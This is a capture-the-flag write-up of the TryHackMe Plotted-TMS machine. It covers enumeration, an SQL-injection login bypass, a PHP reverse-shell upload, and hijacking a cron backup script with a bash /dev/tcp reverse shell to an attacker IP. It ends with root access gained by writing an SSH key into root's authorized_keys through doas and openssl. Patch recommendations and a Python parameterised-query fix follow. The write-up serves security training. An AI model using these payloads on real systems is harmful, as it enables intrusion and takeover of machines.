---
title: "Writeup - Plotted-TMS (THM)"
date: 2022-03-31
slug: "writeup-plotted-tms-thm"
type: "writeup-ctf"
---

This is a writeup for the [Plotted-TMS](https://tryhackme.com/room/plottedtms) machine from the TryHackMe site.

## Enumeration

First, let's start with a scan of our target with the following command:

```bash
nmap -sV -T4 -Pn 10.10.173.55
```

Three TCP ports are discovered:

![](img/image-1.webp)

- 22/tcp : SSH port (OpenSSH 8.2)
- 80/tcp : HTTP web server (Apache 2.4.41)
- 445/tcp : HTTP web server (Apache 2.4.41)

## Exploit

I start by listing the directories of the site hosted on port 445:

![](img/image-2.webp)

We find a `management` page that gives us access to an admin login page.

![](img/image-3.webp)

After a few injection tests I finally managed to log in with the following injection:

```text
Username = ' or 1=1;-- -
```

I now have access to the admin panel of the site.

![](img/image-4.webp)

In this panel I find the `Settings` page, which allows changing the background image of the site's home page. So I try to upload a PHP reverse shell there.

![](img/image-5.webp)

Then I access it via the following address:

```text
http://10.10.173.55:445/management/uploads/
```

I now have a reverse shell as the user `www-data`.

![](img/image-6.webp)

After some searching I find that the first flag is in the home folder of the user `plot_admin`; the problem is that I do not have permission to read it, so I will have to find a way to change user.

![](img/image-7.webp)

After running [linPEAS](https://linpeas.sh) on the machine I find that every minute a script `backup.sh` is run by the user `plot_admin`.

![](img/image-8.webp)

I don't have permission to modify the content of the script, but I do have write permission on the `/var/www/scripts` folder. So I can replace the current script with a custom one that gives me a reverse shell as `plot_admin`.
To do this I use the following commands:

```bash
mv backup.sh tmp
touch backup.sh
echo "bash -c '/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1'" > backup.sh
chmod +x backup.sh
```

![](img/image-9.webp)

I now have a reverse shell as the user `plot_admin` and I can get the first flag.

## Privilege escalation

I start by listing the SUID files with the following command:

```bash
find / -perm -u=s -type f 2>/dev/null
```

I find a rather uncommon command: [doas](https://man.openbsd.org/doas). This command is an alternative to the `sudo` command. After some research I find on this [site](https://book.hacktricks.xyz/linux-unix/privilege-escalation#doas) that the configuration file of this command is located at `/etc/doas.conf`.

![](img/image-10.webp)

I find that my user can execute the `openssl` command with admin rights. So I look on [GTFOBins](https://gtfobins.github.io/gtfobins/openssl/) for exploits related to this command. I find that it can be used to write to files, so I will be able to add my SSH key to the `authorized_keys` file and then connect to the root account via SSH. To do this I use the following commands:

```bash
FILE=/root/.ssh/authorized_keys
echo "ssh-rsa [key] kali@kali" | doas openssl enc -out "$FILE"
```

![](img/image-11.webp)

I now have a `root` shell and can retrieve the last flag.

## Recommendations

To patch this host I think the following actions would be necessary:

- Fix the site code to avoid SQL injections ([OWASP SQL Injection](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html))
- Validate image uploads in the admin panel so that files containing code (such as PHP) are rejected
- Store CRON scripts in a folder that only their owner can access
- Do not grant root rights on commands that do not require it
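Added example illustrating the first two recommendations (not code from the original writeup or the room): the login query in its vulnerable string-concatenated form beside the parameterised fix, checked with the exact payload used above, plus an upload check that rejects non-image files. The table, credentials and file names are constructed; the real site is PHP, and the same fix applies there with PDO prepared statements.

```python
import os
import sqlite3

# Constructed in-memory table standing in for the management panel's user
# table; the credentials are made up for this example (plaintext only to
# keep the demo short; real code stores password hashes).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cr3t!')")
    return db

def login_vulnerable(db, username, password):
    # String concatenation: the attacker's quote closes the literal,
    # "or 1=1" makes the WHERE clause true for every row, and "-- -"
    # comments out the password check.
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(db, username, password):
    # Parameterised query: the input is bound as a value, never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# Leading bytes of the image formats the settings page should accept.
IMAGE_SIGNATURES = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")

def is_valid_image_upload(filename, data):
    # The extension allowlist rejects shell.php; the signature check rejects
    # a PHP file renamed to .png. Save the file under a server-generated name
    # so the user-supplied name never reaches the filesystem.
    ext = os.path.splitext(filename)[1].lower()
    if ext not in (".png", ".jpg", ".jpeg", ".gif"):
        return False
    return data.startswith(IMAGE_SIGNATURES)

PAYLOAD = "' or 1=1;-- -"  # the bypass used against the login page above

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, PAYLOAD, "x"))   # admin: bypass succeeds
    print(login_fixed(db, PAYLOAD, "x"))        # None: bypass fails
    print(login_fixed(db, "admin", "S3cr3t!"))  # admin: real login still works
    print(is_valid_image_upload("shell.php", b"<?php echo 'hi'; ?>"))  # False
    print(is_valid_image_upload("logo.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 16))  # True
```

Signature checks alone do not stop image/PHP polyglots, so the uploads directory should also be served with PHP execution disabled or kept outside the web root.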